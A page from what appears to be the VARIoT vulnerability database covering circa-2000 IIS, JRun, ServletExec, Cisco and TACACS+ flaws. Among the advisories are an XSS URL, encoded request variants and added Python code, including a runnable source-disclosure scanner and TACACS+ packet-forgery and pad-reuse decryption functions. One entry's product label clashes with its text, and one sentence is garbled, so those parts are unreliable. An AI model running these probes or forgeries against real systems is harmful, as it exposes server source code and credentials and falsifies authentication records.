VARIoT IoT vulnerabilities database
VAR-200006-0151 | CVE-2000-0778 | Microsoft IIS Vulnerabilities in source file information disclosure |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 5.0 allows remote attackers to obtain source code for .ASP files and other scripts via an HTTP GET request with a "Translate: f" header, aka the "Specialized Header" vulnerability. When Microsoft IIS receives an HTTP GET request carrying a "Translate: f" header, a flaw causes it to locate the correct file but not to recognize it as a file that must be processed by the script engine, so the file is sent to the browser as-is. The source of files with script extensions such as .ASP, .ASA and .HTR, which would normally never be viewable, can be read this way. Many web servers are case-sensitive, but do not have every case combination of their mapped extensions mapped properly.
By changing the letters of a JSP or JHTML file extension from lower case to upper case (e.g. .jsp or .jhtml becomes .JSP or .JHTML) in a URL, the server does not recognize the file extension and sends the file as a plain file. In that manner, a user is able to access the source code of those files. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA and HTR files. The scripting engines handle requests for these file types, process them accordingly, and execute them on the server.
# Title: Cisco Collaboration Server 5 XSS, Source Code Disclosure
# Author: s4squatch
# Published: 2010-02-11
Cisco Collaboration Server 5 XSS, Source Code Disclosure
Discovered by: s4squatch of SecureState R&D Team (www.securestate.com)
Discovered: 08/26/2008
Note: End of Engineering --> http://www.cisco.com/en/US/products/sw/custcosw/ps747/prod_eol_notice09186a008032d4d0.html
Replaced with: http://www.cisco.com/en/US/products/ps7233/index.html and http://www.cisco.com/en/US/products/ps7236/index.html
XSS
===
http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">
Java Servlet Source Code Disclosure
===================================
The source code of .jhtml files is revealed to the end user by requesting any of the following:
Normal File: file.html
Modified 1: file%2Ejhtml
Modified 2: file.jhtm%6C
Modified 3: file.jhtml%00
Modified 4: file.jhtml%c0%80
Cisco Collaboration Server 5 Paths It Works On (list may not be complete)
=========================================================================
http://www.website.com/doc/docindex.jhtml
http://www.website.com/browserId/wizardForm.jhtml
http://www.website.com/webline/html/forms/callback.jhtml
http://www.website.com/webline/html/forms/callbackICM.jhtml
http://www.website.com/webline/html/agent/AgentFrame.jhtml
http://www.website.com/webline/html/agent/default/badlogin.jhtml
http://www.website.com/callme/callForm.jhtml
http://www.website.com/webline/html/multichatui/nowDefunctWindow.jhtml
http://www.website.com/browserId/wizard.jhtml
http://www.website.com/admin/CiscoAdmin.jhtml
http://www.website.com/msccallme/mscCallForm.jhtml
http://www.website.com/webline/html/admin/wcs/LoginPage.jhtml
Related Public Info
===================
http://www.securityfocus.com/bid/3592/info
http://www.securityfocus.com/bid/1578/info
http://www.securityfocus.com/bid/1328/info
Scott White<mailto:swhite@securestate.com> | Senior Consultant | SecureState
VAR-200006-0148 | CVE-2000-0498 | JSP Source code leak vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Unify eWave ServletExec allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case. Many web servers are case-sensitive, but do not have every case combination of their mapped extensions mapped properly; in that manner, a user is able to access the source code of those files. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA and HTR files. The scripting engines handle requests for these file types, process them accordingly, and execute them on the server.
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains the specialized header 'Translate: f' and a trailing slash '/' is appended to the end of the URL. The scripting engine locates the requested file but does not recognize it as a file that needs to be processed, and sends the file source to the client.
VAR-200006-0150 | CVE-2001-1510 | Allaire JRun Web Root directory leak vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL. Many web servers are case-sensitive, but do not have every case combination of their mapped extensions mapped properly.
By changing the letters of a JSP or JHTML file extension from lower case to upper case (e.g. .jsp or .jhtml becomes .JSP or .JHTML) in a URL, the server does not recognize the file extension and sends the file as a plain file. In that manner, a user is able to access the source code of those files. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA and HTR files. The scripting engines handle requests for these file types, process them accordingly, and execute them on the server.
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains the specialized header 'Translate: f' and a trailing slash '/' is appended to the end of the URL. The scripting engine locates the requested file but does not recognize it as a file that needs to be processed, and sends the file source to the client. Allaire JRun is a development suite with JSP and Java Servlets for developing web applications.
Allaire JRun is prone to an information-disclosure vulnerability because it fails to handle malformed URLs properly. A remote attacker could access the contents under the webserver root directory.
Submitting a request for 'http://server/%3f.jsp' could cause JRun to reveal the contents within the web root. It's also possible to view the contents of any subdirectories along with ACL-protected resources.
The attacker could exploit this issue to obtain the source of known files residing on the host, including ASP files.
NOTE: This vulnerability was originally reported to work on Microsoft IIS hosts only, but other webservers (Apache, Jetty) have been reported vulnerable.
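The request variants the entries above describe (the IIS 5.0 "Translate: f" header with a trailing slash, the upper-cased JSP/JHTML extension against ServletExec, the encoded-extension, NUL and overlong-UTF-8 suffixes from the Cisco Collaboration Server advisory, and JRun's "%3f.jsp", "?.jsp" and "?" suffixes), collected into one probe set. This is an added example, not code from any of the advisories or vendors: build_variants() derives the documented request forms from one script path, looks_like_source() flags a response body that still contains server-side script delimiters, and probe() sends the set with the standard library. The sample path, the Host value and the sample bodies are constructed for the demonstration.

```python
import http.client
import re
from typing import Dict, List, Tuple

# (label, request path, extra request headers)
Probe = Tuple[str, str, Dict[str, str]]


def build_variants(path: str) -> List[Probe]:
    """Derive the documented source-disclosure request forms from one script path."""
    stem, dot, ext = path.rpartition(".")
    if not dot or "/" in ext:
        raise ValueError("path must end in a file extension")
    return [
        # IIS 5.0 "Specialized Header": file is located but skips the script engine.
        ("translate_f", path + "/", {"Translate": "f"}),
        # Unify eWave ServletExec: case-sensitive handler map, upper-cased extension.
        ("upper_ext", f"{stem}.{ext.upper()}", {}),
        # Cisco Collaboration Server .jhtml variants: encoded dot, encoded last
        # extension byte, trailing NUL, trailing overlong-UTF-8 NUL.
        ("enc_dot", f"{stem}%2E{ext}", {}),
        ("enc_last", f"{stem}.{ext[:-1]}%{ord(ext[-1]):02X}", {}),
        ("nul", path + "%00", {}),
        ("overlong_nul", path + "%c0%80", {}),
        # Allaire JRun: query-looking suffixes make JRun read the resource raw.
        ("jrun_enc_qjsp", path + "%3f.jsp", {}),
        ("jrun_qjsp", path + "?.jsp", {}),
        ("jrun_q", path + "?", {}),
    ]


# Server-side delimiters that a correctly rendered page never contains.
SOURCE_MARKERS = re.compile(rb"<%@|<%=|<%|<jsp:|<script\s+runat=server", re.I)


def looks_like_source(body: bytes) -> bool:
    """True when a response body still carries unrendered server-side script."""
    return SOURCE_MARKERS.search(body) is not None


def probe(host: str, path: str, port: int = 80, timeout: float = 5.0) -> Dict[str, bool]:
    """Send every variant to host and report which ones returned source (network needed)."""
    results: Dict[str, bool] = {}
    for label, req_path, extra in build_variants(path):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", req_path, headers={"Host": host, **extra})
            resp = conn.getresponse()
            results[label] = resp.status == 200 and looks_like_source(resp.read())
        finally:
            conn.close()
    return results
```

Only build_variants() and looks_like_source() are needed offline; probe() is the online wrapper, and a 200 with script delimiters in the body is the positive signal to look for in whichever variant the target honours.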
VAR-200006-0121 | No CVE | Allegro RomPager Abnormal URL Request Denial of Service Attack |
CVSS V2: - CVSS V3: - Severity: - |
Allegro's RomPager is an embedded web server product, mostly used to provide web-based management for network printers, switches and other network devices. If a specially crafted malformed request is submitted, RomPager may crash; this often takes the managed device down with it, leaving the network device, or even the whole network, unavailable. All a remote attacker needs is a browser. Versions other than 2.10 may also be affected by this attack. The following is a partial list of manufacturers' products known to use Allegro RomPager:
3Com: TotalSwitch LAN switching hubs, LANLinker Dual Analog Router
Acacia Networks: NovaSwitch Ethernet switches
APC: UPS products with web management
Andover Controls Corporation: Infinity automated building controls
Bizfon: Bizfon 680 Multifunction communications server
D-Link Systems: DES-3225G 24-port 10/100Mbps Ethernet switch, DES-3224+
EdgePoint Networks: EdgeStar, EdgeStack, EdgeSwitch
Extreme Networks: Summit Gigabit Switch
Foundry Networks: BigIron Switching Routers, FastIron Switches, NetIron Core Routers (possibly entire product line)
Interspeed: System 1000 and 500 Central Office ADSL routers
LANart Corporation: Segway Adaptive Microsegmentable Ethernet Hub
Netopia Communications: Netopia ISDN router products
NETsilicon, Inc.: NET+ARM product family
Net To Net Technologies: IP DSL Access Multiplexer 12000
Network Peripherals: NuSwitch Ethernet switches and hubs
Northern Telecom: Accelar Gigabit Ethernet
Osicom: NETPrint 1000 print server, various Ethernet switch products
Proxim: RangeLAN2
QMS: various networked printers
Xerox: DocuPrint laser printers
VAR-200006-0060 | CVE-2000-0482 | IP Fragmentation Denial-of-Service Vulnerability in FireWall-1 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Check Point Firewall-1 allows remote attackers to cause a denial of service by sending a large number of malformed fragmented IP packets. A large stream of such IP traffic can monopolize the CPU of a Check Point FireWall-1 firewall, resulting in a denial-of-service condition. The FireWall-1 rulebase cannot prevent this attack, and it is not logged in the firewall logs. Check Point Firewall-1 is vulnerable
VAR-200006-0045 | CVE-2000-0516 | Shiva Access Manager Globally readable LDAP Password vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
When configured to store configuration information in an LDAP directory, Shiva Access Manager 5.0.0 stores the root DN (Distinguished Name) name and password in cleartext in a file that is world readable, which allows local users to compromise the LDAP server. The Shiva Access Manager is a solution for centralized remote access authentication, authorization, and accounting offered by Intel. It runs on Solaris and Windows NT. Shiva Access Manager is vulnerable to a default-configuration problem in its Solaris version (and possibly in the NT version as well, though unconfirmed). It stores the LDAP root DN and password in a text file that is owned by root and world-readable by default, $SHIVA_HOME_DIR/insnmgmt/shiva_access_manager/radtac.ini. This file also contains the LDAP server's hostname and port. This information can be used to completely compromise the LDAP server
VAR-200006-0120 | No CVE | ITHouse Mail Server 1.04 Remote Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
ITHouse Mail Server 1.04 has a remote overflow vulnerability. An attacker constructs a special email whose "recipient" field contains more than 2270 bytes of data; this overflows the ITHouse mail server and may allow arbitrary code to be executed. <* Source: Delphis Consulting Plc Security Team Advisories [30/05/2000] securityteam@delphisplc.com http://www.delphisplc.com/thinking/whitepapers/ *>
VAR-200006-0001 | CVE-1999-0590 | Apple macOS Security hole |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
A system does not present an appropriate legal message or warning to a user who is accessing it. kernel is prone to a remote security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks
VAR-200005-0087 | CVE-2000-0486 | TACACS+ Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Buffer overflow in Cisco TACACS+ tac_plus server allows remote attackers to cause a denial of service via a malformed packet with a long length field. A small buffer overrun exists in the free, unsupported implementation of the tacacs+ server, distributed by Cisco. This vulnerability, while a buffer overrun, appears to not be exploitable due to its short nature.
While the analysis of the tacacs+ protocol posted to Bugtraq indicated that clients, including IOS, were vulnerable to the above problems, Cisco claims that IOS clients will reject the packets as invalid, and report an error, without any further problems. Attacking the client requires the ability to perform blind TCP sequencing, and as such is difficult to conduct.
The first vulnerability, a buffer overflow, is due to the nature in which the tac_plus server allocates memory for the incoming packet. It will read only up to the length of the header in a primary read, allocate the amount of memory indicated in the header, copy the header into the allocated memory, and then read and copy the remaining buffer in. The buffer overrun is caused by it failing to check for an integer overflow in the length field of the header when added to the header length. This can result in an 11 byte overflow.
The second vulnerability is due to a lack of sanity checking on the length field. An arbitrarily large number can be sent for the body length. The server or client will malloc whatever the length presented is, and as such may allocate an excessive amount of memory, resulting in the denial of service previously mentioned
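The length arithmetic behind both tac_plus problems, as an added example (not tac_plus code). The TACACS+ header is 12 bytes and ends in a 32-bit body length; the description says the server added the header size to that length and allocated the sum, so a length near 2^32 wraps to a tiny buffer and the 12-byte header copy runs past it, while a merely large length produces an oversized malloc. The functions below model that 32-bit arithmetic and give the checks a fixed parser applies. The 64 KiB cap and the three packets are constructed assumptions.

```python
import struct

HDR_SIZE = 12                   # version, type, seq_no, flags, session_id, length
U32 = 0xFFFFFFFF
MAX_BODY = 64 * 1024            # assumed policy cap; not a protocol constant
HDR_FMT = "!BBBBII"             # network byte order, 12 bytes


def parse_header(raw: bytes):
    """Unpack (version, type, seq_no, flags, session_id, length) from the first 12 bytes."""
    if len(raw) < HDR_SIZE:
        raise ValueError("short header")
    return struct.unpack(HDR_FMT, raw[:HDR_SIZE])


def vulnerable_alloc_size(length: int) -> int:
    """The 32-bit sum the server allocated; wraps for any length above 0xFFFFFFF3."""
    return (length + HDR_SIZE) & U32


def header_overrun(length: int) -> int:
    """Bytes the 12-byte header copy writes past a buffer of vulnerable_alloc_size()."""
    alloc = vulnerable_alloc_size(length)
    return HDR_SIZE - alloc if alloc < HDR_SIZE else 0


def check_length(length: int):
    """Fixed check: refuse wrap-around and oversized bodies. Returns a reason, or None if fine."""
    if length > U32 - HDR_SIZE:
        return "length wraps 32-bit total"
    if length > MAX_BODY:
        return "body exceeds cap"
    return None


def accept_packet(raw: bytes):
    """(True, total bytes to allocate) or (False, reason) for a received header."""
    _ver, _typ, _seq, _flags, _sid, length = parse_header(raw)
    reason = check_length(length)
    if reason is not None:
        return False, reason
    return True, length + HDR_SIZE


# Constructed headers: version 0xC0, type 1 (authen), seq 1, flags 0, session_id 0x1234.
PKT_WRAP = struct.pack(HDR_FMT, 0xC0, 1, 1, 0, 0x1234, 0xFFFFFFF5)   # sum wraps to 1: 11-byte overrun
PKT_HUGE = struct.pack(HDR_FMT, 0xC0, 1, 1, 0, 0x1234, 0x7FFFFFFF)   # no wrap, 2 GiB malloc
PKT_OK = struct.pack(HDR_FMT, 0xC0, 1, 1, 0, 0x1234, 16)
```

The wrap check must be done before the addition, in the width the allocator actually uses; a cap alone would not catch 0xFFFFFFF5, because the wrapped sum (1) is well under any cap.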
VAR-200005-0117 | No CVE | TACACS+ Protocol Flaws Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
A number of vulnerabilities exist in the TACACS+ protocol. These are part of the protocol, and as such do not affect only those products listed as being vulnerable, but any implementation of TACACS+, both on the client and on the server side.
1) Integrity Checking
TACACS+ does not use any form of integrity checking to ensure a TACACS+ packet has not been tampered with. Due to the nature of its encryption mechanism, an attacker could potentially alter a packet by flipping bits. One example cited is the possibility of an attacker flipping a single bit to alter an accounting packet, changing the elapsed_time being reported from 9000 to 1000.
2) Vulnerability to Replay
TACACS+ has no protection against replay attacks. So long as a packet has the correct TACACS+ sequence number, it will be accepted. As TACACS+ sequence numbers start at 1, the server will always process packets with the sequence number of 1. The description of this vulnerability noted that this is most easily used against accounting packets, as they are single packet transactions.
3) Session ID collision
The encryption mechanism for TACACS+ depends heavily on a unique session_id for each session. If multiple sessions get the same session_id and seq_no, it can become vulnerable to a frequency analysis attack. In addition, if plaintext is known in one packet, it is trivial to decrypt the corresponding portion of the other packet containing the same sequence and session id. It is possible to get a TACACS+ server to encrypt a reply packet using a chosen session_id. This makes it possible to compromise the encryption of packets from the server to client.
4) Session ID randomness
Due to the length of the session_id, and an inability to prevent id collision across reboots and multiple servers, session id's will eventually be reused, which can result in the decryption of packets. For an ISP handling 20,000 dialup sessions a day, there could be over 100,000 session_id collisions in a year.
5) Lack of padding
A lack of padding of fields in the protocol can reveal the length of these unpadded fields. This could result in revealing the length of a user password.
6) MD5 context leak
A theoretical vulnerability exists whereby part of a packet may be decrypted, due to the presence of certain bytes.
These attacks all require the attacker to be present on the network where these transactions are taking place; in some cases, the attack may need to be conducted from a machine or router separating the client from the server. As such, while very real vulnerabilities, using them in a real-world situation may be difficult.
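The TACACS+ body obfuscation and two of the flaws listed above, as an added example (not any vendor's code). tacacs_pad() is the MD5 pseudo-pad the protocol specifies (MD5 over session_id, shared secret, version and seq_no, chained block by block), and the body is XORed with it. Because that is a keystream with no integrity check, flaw 1 is a position-wise XOR on the ciphertext (rewrite_field() turns elapsed_time=9000 into 1000 without the key), and flaws 3 and 4 follow from pad reuse: two packets with the same session_id and seq_no share a pad, so one known body reveals the other (recover_from_pad_reuse()). Flaw 5 is visible in the ciphertext length equalling the body length. The key, session_id and packet bodies are constructed.

```python
import hashlib


def tacacs_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """MD5 pseudo-pad: MD5_1 = MD5(sid|key|ver|seq), MD5_n = MD5(sid|key|ver|seq|MD5_n-1)."""
    prefix = session_id.to_bytes(4, "big") + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR over the common length."""
    return bytes(x ^ y for x, y in zip(a, b))


def tacacs_crypt(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """Encrypt and decrypt are the same XOR with the pad; output length equals input length."""
    pad = tacacs_pad(session_id, key, version, seq_no, len(body))
    return xor(body, pad)


def rewrite_field(ciphertext: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Flaw 1: replace a known plaintext field inside the ciphertext without the key."""
    if len(old) != len(new):
        raise ValueError("the pad is position-bound: the replacement must keep the length")
    end = offset + len(old)
    return ciphertext[:offset] + xor(ciphertext[offset:end], xor(old, new)) + ciphertext[end:]


def recover_from_pad_reuse(c_known: bytes, p_known: bytes, c_other: bytes) -> bytes:
    """Flaws 3/4: packets sharing session_id and seq_no share a pad; one known body yields the other."""
    pad = xor(c_known, p_known)
    return xor(c_other, pad)
```

Nothing on the receiving side can tell a rewritten accounting record from a genuine one, because the only secret-dependent value is the pad and the pad is never authenticated; the shared secret only has to be known for the pad-reuse case to be unnecessary.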
VAR-200005-0111 | No CVE | WebShield SMTP 4.5.44 Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The remote management service of Network Associates WebShield SMTP 4.5.44 listens on port 9999. Once connected to this port, the current configuration can be retrieved by executing the command GET_CONFIG<CR>. When a configuration parameter string of more than 208 bytes is accepted, a stack overflow occurs. The service usually crashes; if the string contains executable code, an attacker may execute arbitrary commands as SYSTEM. <* Source: Delphis Consulting Plc Security Team Advisories securityteam@delphisplc.com *>
VAR-200005-0062 | CVE-2000-0418 | Cayman 3220H DSL router "ping of death" Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Cayman 3220-H DSL router allows remote attackers to cause a denial of service via oversized ICMP echo (ping) requests. Reported effects vary; sometimes it stops telnet and http admin services, other times the router may restart without routing but the admin services stay up. The Cayman 3220H DSL router is vulnerable
VAR-200007-0058 | CVE-2000-0619 | Top Layer AppSwitch Service rejection |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Top Layer AppSwitch 2500 allows remote attackers to cause a denial of service via malformed ICMP packets. TopLayer AppSwitch 2500 has been reported to be vulnerable to numerous DoS attacks. Fragmented packets, bad ICMP checksums, and other anomalous packets are reported to crash the switch. Vulnerabilities exist in Top Layer AppSwitch version 2500
VAR-200005-0006 | CVE-2000-0305 | IP Packet Fragment Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Windows 95, Windows 98, Windows 2000, Windows NT 4.0, and Terminal Server systems allow a remote attacker to cause a denial of service by sending a large number of identical fragmented IP packets, aka jolt2 or the "IP Fragment Reassembly" vulnerability. CPU utilization will return to normal after the attack has ceased. In some cases, this attack could produce a blue screen of death.
An analysis of the exploit was posted to BugTraq on May 26, 2000 by Mikael Olsson <mikael.olsson@enternet.se>. He concludes that the DoS initiated by this attack may not be related to IP fragmentation but rather to resource exhaustion and a problem in the filtering of bad packets by Microsoft Windows.
See the messages referenced by Mikael Olsson for a further interpretation of the mechanism of this attack
VAR-200005-0080 | CVE-2000-0437 | Gauntlet Firewall Remote Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow in the CyberPatrol daemon "cyberdaemon" used in gauntlet and WebShield allows remote attackers to cause a denial of service or execute arbitrary commands. A buffer overflow exists in the version of Mattel's Cyber Patrol software integrated in to Network Associates Gauntlet firewall, versions 4.1, 4.2, 5.0 and 5.5. Due to the manner in which Cyber Patrol was integrated, a vulnerability was introduced which could allow a remote attacker to gain root access on the firewall, or execute arbitrary commands on the firewall.
By default, Cyber Patrol is installed on Gauntlet installations and runs for 30 days, after which it is disabled. During this 30-day period the firewall is susceptible to attack. Because the filtering software is externally accessible, users not on the internal network may also be able to exploit the vulnerability.
Some versions of SGI IRIX shipped with the Gauntlet Firewall package, and in the past it was a supported SGI product. While it is no longer being supported, SGI IRIX versions 6.5.2, 6.5.3, 6.5.4 and 6.5.5 may be prone to this issue
VAR-200005-0061 | CVE-2000-0417 | Cayman 3220-H DSL Router DoS Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The HTTP administration interface to the Cayman 3220-H DSL router allows remote attackers to cause a denial of service via a long username or password. The router log will show "restart not in response to admin command". The HTTP management interface of the Cayman 3220-H DSL router is vulnerable
VAR-200005-0008 | CVE-2000-0379 | Netopia DSL Router Vulnerability |
CVSS V2: 3.6 CVSS V3: - Severity: LOW |
The Netopia R9100 router does not prevent authenticated users from modifying SNMP tables, even if the administrator has configured it to do so. The router has a command-line mode that is reached by typing control-N after the user has passed the initial login test. At the "#" prompt one can then do most management of the device. This includes the setting of SNMP community strings in spite of the limitation imposed by the administrator.
The following devices are confirmed as vulnerable:
R2020 Dual Analog Router
R3100 ISDN Router
R3100-I ISDL Router
R3100-T IDSL router for Covad
R3232-I IDSL 4-IMUX router
R5100 Serial router
R5200 DDS router
R5220 DDS router w/ V.90 backup
R5300 T1 router
R5320 T1 router w/ V.90 backup
R5331 T1 router w/ ISDN backup
R7100-C SDSL router
R7120 SDSL Router w/int V.90
R7131 SDSL router w/int ISDN
R7171 SDSL 2x IMUX router
R7200-T SDSL router for Covad
R7220 SDSL router w/int.V.90
R7231 SDSL router w/int ISDN
R9100 Ethernet-to-ethernet Router
VAR-200007-0068 | CVE-2000-0630 | Microsoft Internet Information Server (IIS) discloses contents of files via crafted request containing "+.htr" |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 4.0 and 5.0 allows remote attackers to obtain fragments of source code by appending a +.htr to the URL, a variant of the "File Fragment Reading via .HTR" vulnerability. A vulnerability exists in Microsoft Internet Information Server (IIS) that could disclose sensitive information contained in CGI-type files. Typically a CGI/script file on a web server should only be executable, not readable, by remote users; sensitive information in such files might include user credentials for access to a back-end database. This is a variation of the vulnerability previously discussed in VU#35085 and Microsoft Security Bulletin MS00-031. Requesting a known filename with the extension replaced with .htr, preceded by approximately 230 "%20" sequences (the escaped representation of a space), from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and return its contents. This is due to the .htr file extension being mapped to the ISM.DLL ISAPI application, to which .htr file requests are redirected. ISM.DLL removes the extraneous "%20" sequences, replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488.
This action can only be performed if a .htr request has not been previously made or if ISM.DLL is loaded into memory for the first time. If an .htr request has already been made, a restart of the web server is necessary in order to perform another. Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the <script runat=server></script> delimiters instead will display the entire source, or up to any '<%' in the page
VAR-200005-0053 | CVE-2000-0408 | Microsoft IIS Service operation by handling invalid file extension (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 4.05 and 5.0 allow remote attackers to cause a denial of service via a long, complex URL that appears to contain a large number of file extensions, aka the "Malformed Extension Data in URL" vulnerability. Restarting the application or waiting until the URL is processed will be required in order to regain normal functionality
VAR-200005-0109 | CVE-2000-0457 | Microsoft Internet Information Server (IIS) discloses contents of files via crafted request containing "+.htr" |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
ISM.DLL in IIS 4.0 and 5.0 allows remote attackers to read file contents by requesting the file and appending a large number of encoded spaces (%20) and terminated with a .htr extension, aka the ".HTR File Fragment Reading" or "File Fragment Reading via .HTR" vulnerability. A vulnerability exists in Microsoft Internet Information Server (IIS) that could disclose sensitive information contained in CGI-type files. Typically a CGI/script file on a web server should only be executable, not readable, by remote users; sensitive information in such files might include user credentials for access to a back-end database. This is a variation of the vulnerability previously discussed in VU#35085 and Microsoft Security Bulletin MS00-031. Microsoft IIS also has a flaw in which (1) a password-change (.HTR) request that omits a required delimiter, or (2) a request in which a known file extension is replaced by a particular string, triggers an unbounded search that sharply reduces processing capacity, leaving Microsoft IIS in a denial-of-service (DoS) state. Requesting a known filename with the extension replaced with .htr, preceded by approximately 230 "%20" sequences (the escaped representation of a space), from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and return its contents. This is due to the .htr file extension being mapped to the ISM.DLL ISAPI application, to which .htr file requests are redirected. ISM.DLL removes the extraneous "%20" sequences, replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488.
This action can only be performed if a .htr request has not been previously made or if ISM.DLL is loaded into memory for the first time. If an .htr request has already been made, a restart of the web server is necessary in order to perform another. Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file specified in the request. There has been a report that source will be displayed up to the first '<%' encountered - '<%' and '%>' are server-side script delimiters. Pages which use the <script runat=server></script> delimiters instead will display the entire source, or up to any '<%' in the page
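A toy model of the server-side handler dispatch that the source-disclosure entries on this page share (the case-variant extensions of CVE-2000-0498, the "Translate: f" request of CVE-2000-0778, and the "+.htr" suffix handled by ISM.DLL in the two entries above). This is an added example, not IIS, ServletExec or JRun code; WEBROOT, run_engine() and both dispatchers are constructed. vulnerable_dispatch() reproduces the three routes the descriptions give: a handler map keyed on the extension exactly as requested, so "/login.ASP" misses it; a "Translate: f" request with a trailing slash that locates the file but never reaches the engine; and a "+.htr" suffix that a helper strips before returning the file unprocessed. hardened_dispatch() decides by the extension of the file actually found, never by the shape of the request, so each of those routes either renders through the engine or returns nothing.

```python
from typing import Dict, Optional, Tuple

# Constructed web root: one server-side script and one static page.
WEBROOT: Dict[str, bytes] = {
    "/login.asp": b'<% Set db = Server.CreateObject("ADODB.Connection") %><html>ok</html>',
    "/index.html": b"<html>hello</html>",
}

# Extensions the toy script engine owns; the real servers map these to a handler DLL/servlet.
SCRIPT_EXTS = {"asp", "asa", "htr", "jsp", "jhtml"}


def run_engine(source: bytes) -> bytes:
    """Stand-in for the script engine: drops every <% ... %> block and returns the rest."""
    out, i = b"", 0
    while True:
        start = source.find(b"<%", i)
        if start < 0:
            return out + source[i:]
        end = source.find(b"%>", start)
        if end < 0:
            return out + source[i:start]
        out += source[i:start]
        i = end + 2


def lookup(path: str) -> Optional[Tuple[str, bytes]]:
    """Case-insensitive file lookup, as on an NTFS web root; returns (stored name, data)."""
    for stored, data in WEBROOT.items():
        if stored.lower() == path.lower():
            return stored, data
    return None


def vulnerable_dispatch(path: str, headers: Optional[Dict[str, str]] = None) -> Optional[bytes]:
    """Reproduces the three bypass routes described in the entries."""
    headers = headers or {}
    # Route 3 (+.htr): the .htr helper strips its suffix and returns the named
    # file without handing it to the engine.
    if path.endswith("+.htr"):
        found = lookup(path[: -len("+.htr")])
        return found[1] if found else None
    # Route 2 (Translate: f + trailing slash): the file is located for the
    # authoring path and sent as-is; the script engine is never consulted.
    if headers.get("Translate", "").lower() == "f" and path.endswith("/"):
        found = lookup(path[:-1])
        return found[1] if found else None
    found = lookup(path)
    if found is None:
        return None
    # Route 1 (case): the handler map is keyed on the extension exactly as
    # requested, so "/login.ASP" misses the map and is served as static content.
    ext = path.rsplit(".", 1)[-1]
    return run_engine(found[1]) if ext in SCRIPT_EXTS else found[1]


def hardened_dispatch(path: str, headers: Optional[Dict[str, str]] = None) -> Optional[bytes]:
    """Decide by the file actually found, never by the shape of the request."""
    found = lookup(path)          # "/login.asp/" and "/login.asp+.htr" are not files
    if found is None:
        return None
    stored, data = found
    ext = stored.rsplit(".", 1)[-1].lower()   # the real file's extension, normalised
    # Script files only ever leave through the engine; the Translate header is ignored.
    return run_engine(data) if ext in SCRIPT_EXTS else data
```

The common fix is the same in each case: canonicalise the request to a real file first, then pick the handler from that file's normalised extension, and never let an alternate route (an authoring header, a helper DLL, an unmapped spelling of the extension) return the raw bytes of something the engine owns.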